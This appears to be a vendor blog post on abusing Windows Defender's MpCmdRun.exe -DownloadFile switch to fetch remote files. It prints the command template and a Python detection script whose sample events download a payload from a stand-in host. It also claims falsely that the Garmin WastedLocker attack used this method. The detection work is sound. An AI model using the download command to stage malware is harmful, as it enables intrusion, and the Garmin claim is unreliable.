Microsoft recently released an update for Windows Defender that comes with a major vulnerability: it allows applications to download malware onto the host machine. Abusing legitimate, signed system files to download malware is called a living-off-the-land binary (LOLBin) attack.

The issue exists in the command-line tool MpCmdRun.exe, which allows malicious actors to download a malicious program from a remote location to the host device.

Security researcher Mohammad Askar identified this issue and posted it on Twitter. The flaw allows a user to download any file from a remote location using the command line below:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

See Mohammad's tweet about the Windows Defender antimalware command-line vulnerability in version 4.18.2009.9.
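Because MpCmdRun.exe is a signed Microsoft binary, the practical defensive control is to alert on the command line itself. The following detection logic is an added example (not code from the original post or from Mohammad Askar); it assumes process-creation events shaped like Sysmon Event ID 1 or Security 4688 records with `Image` and `CommandLine` fields, and the events and the example.invalid URL are constructed sample data.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample process-creation events (not real telemetry). Event 0 is a
# routine scan, events 1 and 2 use -DownloadFile (with mixed case and quoted
# values), event 3 is an unrelated process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 2'},
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
     "CommandLine": r"MpCmdRun.exe -DownloadFile -url http://example.invalid/payload.bin -path C:\Users\Public\payload.bin"},
    {"Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
     "CommandLine": r'mpcmdrun.exe -downloadfile -url "http://example.invalid/a b.exe" -path "C:\temp\a b.exe"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\notes.txt"},
]

@dataclass
class Finding:
    url: str
    save_path: str
    image: str

def _split_cmdline(cmdline: str) -> List[str]:
    # posix=False keeps backslashes in Windows paths intact; quotes are kept on
    # the token by shlex in that mode, so strip them here.
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]

def inspect_event(event: dict) -> Optional[Finding]:
    """Return a Finding when MpCmdRun.exe is invoked with -DownloadFile, else None."""
    image_name = re.split(r"[\\/]", event["Image"])[-1].lower()
    if image_name != "mpcmdrun.exe":
        return None
    tokens = _split_cmdline(event["CommandLine"])
    lowered = [t.lower() for t in tokens]   # switches are case-insensitive
    if "-downloadfile" not in lowered:
        return None
    def value_after(flag: str) -> str:
        i = lowered.index(flag)
        return tokens[i + 1] if i + 1 < len(tokens) else ""
    url = value_after("-url") if "-url" in lowered else ""
    path = value_after("-path") if "-path" in lowered else ""
    return Finding(url=url, save_path=path, image=event["Image"])

def scan_events(events: List[dict]) -> List[Finding]:
    return [f for f in (inspect_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"ALERT MpCmdRun download: url={f.url} path={f.save_path} image={f.image}")
```

Any hit is worth triage: the URL and save path tell you what was fetched and where to look for it, and the image path shows which Defender platform version was used.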

The WastedLocker ransomware that hit Garmin was delivered through the command-line argument mentioned above. Windows Defender will detect the downloaded malicious file when it scans the host device for harmful programs, but it is unclear at the moment whether other antivirus programs will detect it.

System administrators need to be aware of this unique threat vector residing in Windows Defender, a product that is supposed to improve the security of their devices. At the time of publishing this blog, Microsoft has yet to fix this vulnerability, and sysadmins are advised to hold off updating to the latest version until a patch is available. If you've already updated, roll back to the previous version until a fix is issued.

If you're using a patch management solution, you can easily roll back the patches on your managed devices. Not using an endpoint management solution yet? Try ManageEngine Patch Manager Plus.